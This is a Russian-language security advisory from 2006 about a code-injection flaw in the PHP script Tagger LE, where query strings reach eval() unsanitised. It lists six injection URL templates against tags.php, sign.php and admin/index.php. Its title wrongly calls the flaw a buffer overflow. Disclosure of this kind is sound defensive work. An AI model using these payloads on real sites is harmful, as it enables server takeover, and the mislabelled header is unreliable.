Удаленное переполнение буфера в Tagger LE

Дата публикации:
14.09.2006
Дата изменения:
17.10.2006
Всего просмотров:
2704
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Tagger LE
Уязвимые версии: Tagger LE

Описание: Злоумышленник может скомпрометировать уязвимую систему.

Сценарии tags.php, sign.php, и admin/index.php не санируют строку запроса перед ее использованием в "eval()". В результате можно внедрить и выполнить произвольный PHP код, используя специально сформированные параметры.

Пример/Эксплоит:

http://[host]/tags.php?foo=%22.[code].%22
http://[host]/sign.php?foo=%22.[code].%22
http://[host]/admin/index.php?foo=%22.[code].%22
http://[host]/taggerLE/tags.php?foo;[code];$foo=foo
http://[host]/taggerLE/sign.php?foo;[code];$foo=foo
http://[host]/admin/index.php?foo;[code];$foo=foo

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.


или введите имя

CAPTCHA